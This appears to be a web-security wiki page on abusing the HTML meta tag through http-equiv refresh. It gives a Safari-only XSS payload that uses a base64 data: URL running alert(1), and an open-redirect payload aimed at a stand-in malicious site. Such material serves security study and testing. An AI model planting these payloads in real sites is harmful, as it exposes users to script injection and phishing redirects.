meta

The <meta> tag represents metadata that cannot be represented by other HTML meta-related elements.

Some <meta> tags are informational, for example:

<meta name="name" content="content">

And some affect the page in some way, for example:

<meta http-equiv="content-security-policy" content="default-src 'none'; base-uri 'self'">

Moreover, CSP does not regulate such <meta> elements. <meta http-equiv=...> is a tag on the page that may emulate a subset of functions normally reserved for page headers. Similarly, some of these functions appear in Javascript, which is already heavily regulated by CSP. Dangerous functions that can be performed by <meta http-equiv=...> include:

set-cookie,
refresh:
- redirect to any regular URL,
- redirect to any data: URL.

set-cookie instruction was removed from the standard, and is no longer supported at all in Firefox 68 and Chrome 65.

XSS

We can use the <meta> tag with content = "0; data: " URI to execute arbitrary Javascript code (works only on safari), for example:

<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" http-equiv="refresh"/>

Firefox and Chrome will block this:

Not allowed to navigate top frame to data URL (Firefox)
Navigation to toplevel data: URI not allowed (Chrome)

Open redirect

Using a similar payload, you can redirect the victim to an malicious page:

<meta name="language" content="5;http://malicious-website.com" http-equiv="refresh"/>

References

<meta> and <iframe> tags chained to SSRF

Previousiframe Nexttarget attribute

Last updated 3 years ago